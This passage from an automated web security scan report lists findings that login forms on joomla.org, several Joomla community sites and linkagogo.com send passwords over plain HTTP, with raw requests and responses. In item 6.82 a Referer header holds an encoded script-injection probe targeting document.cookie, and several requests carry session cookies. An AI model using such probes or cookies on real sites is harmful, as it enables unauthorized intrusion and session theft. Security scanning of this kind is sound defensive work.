<table width="100%" border="0" cellspacing="0" cellpadding="0" class="mod_login">
...[SNIP]...
<span><input type="password" name="passwd" id="mod_login_password" class="inputbox" size="14" /></span>
...[SNIP]...

6.72. http://www.joomla.org/login.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.joomla.org
Path:   /login.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.joomla.org/login.html
The form contains the following password field:
  • passwd

Request

GET /login.html HTTP/1.1
Host: www.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.5.10.1295835652; 205e0a4a54bf75ec79a0fa3b9dc85fc0=41c830520f611d83ab14393c6f4ccb01;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:24 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
</div>
<form action="/login.html" method="post" name="com-login" id="com-form-login">
<table width="100%" border="0" align="center" cellpadding="4" cellspacing="0" class="contentpane">
...[SNIP]...
<br />
       <input type="password" id="passwd" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.73. http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.joomla.org.tw
Path:   /news/joomla-official-news/163-joomla16-arrived

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.joomla.org.tw/component/comprofiler/login
The form contains the following password field:
  • passwd

Request

GET /news/joomla-official-news/163-joomla16-arrived HTTP/1.1
Host: www.joomla.org.tw
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a798c6463d2f54ee9d166568119e0c09=806uqp0b11fh0lrh0emunokum3; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-tw" lang="zh-tw" dir="
...[SNIP]...
<div class="module"><form action="http://www.joomla.org.tw/component/comprofiler/login" method="post" id="mod_loginform" style="margin:0px;">
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="mod_login">
...[SNIP]...
<span><input type="password" name="passwd" id="mod_login_password" class="inputbox" size="14" /></span>
...[SNIP]...

6.74. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.joomlacommunity.eu
Path:   /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.joomlacommunity.eu/index.php
The form contains the following password field:
  • passwd

Request

GET /nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html HTTP/1.1
Host: www.joomlacommunity.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://www.jo
...[SNIP]...
</h3>
                   

<form action="http://www.joomlacommunity.eu/index.php" method="post" name="login" id="form-login" >
           <label for="modlgn_username">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
           <label for="modlgn_remember">
...[SNIP]...

6.75. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.joomlacorner.com
Path:   /joomla-news/608-joomla-16-has-arrived.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.joomlacorner.com/joomla-news/index.php
The form contains the following password field:
  • passwd

Request

GET /joomla-news/608-joomla-16-has-arrived.html HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.16
Set-Cookie: 992260232bef5a730b1bd291176df96d=4a98f8c53f4541210928f4c67e558242; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:16:02 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:16:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th">

...[SNIP]...
<div class="ja-box-ct clearfix">
       <form action="index.php" method="post" name="form-login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
       </label>
...[SNIP]...

6.76. http://www.linkagogo.com/go/AddNoPopup

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.linkagogo.com/go/AddNoPopup
The form contains the following password field:
  • password

Request

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27elZo"
Last-Modified: Tue, 25 Jan 2011 04:41:53 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16308
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
</table>
<form name=urlEdit method="post" action="/go/AddNoPopup">
<input type="hidden" name="target" value="null">
...[SNIP]...
<td>
<input type="password" name="password" value="" size="8">
</td>
...[SNIP]...

6.77. http://www.lithuanianjoomla.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/index.php
The form contains the following password field:
  • password

Request

GET / HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 21729


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/index.php" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.78. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /7-joomla-naujienos/70-joomla-160-isleista.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/
The form contains the following password field:
  • password

Request

GET /7-joomla-naujienos/70-joomla-160-isleista.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:25 GMT
Server: Apache
Set-Cookie: 2d3002958ebe475c6a8e5c841c44742a=ab02d207ed15eb2c3afc574ced1efe67; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.79. http://www.lithuanianjoomla.com/apie-joomla.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /apie-joomla.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/apie-joomla.html
The form contains the following password field:
  • password

Request

GET /apie-joomla.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:04 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 21493


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/apie-joomla.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.80. http://www.lithuanianjoomla.com/component/users/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /component/users/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/component/users/?task=user.login
The form contains the following password field:
  • password

Request

GET /component/users/ HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<div class="login">
   
   
                       <form action="/component/users/?task=user.login" method="post">

       <fieldset>
...[SNIP]...
</label>                    <input type="password" name="password" id="password" value="" class="validate-password required" size="25"/></div>
...[SNIP]...

6.81. http://www.lithuanianjoomla.com/component/users/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /component/users/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/component/users/
The form contains the following password field:
  • password

Request

GET /component/users/ HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/component/users/" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.82. http://www.lithuanianjoomla.com/index.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/index.php
The form contains the following password field:
  • password

Request

GET /index.php HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:16:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 21848


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/index.php" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.83. http://www.lithuanianjoomla.com/joomla-naujienos.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:06 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 21320


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.84. http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:16 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.85. http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.86. http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14423


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.87. http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/5-pirmasis-joomla-gimtadienis.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos/5-pirmasis-joomla-gimtadienis.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:25 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 19125


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.88. http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:53 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16181


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.89. http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15915


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/joomla-naujienos.html" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.90. http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /joomla-naujienos/67-joomla-16-rc1-versija.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.lithuanianjoomla.com/joomla-naujienos.html
The form contains the following password field:
  • password

Request

GET /joomla-naujienos/67-joomla-16-rc1-versija.html HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16738


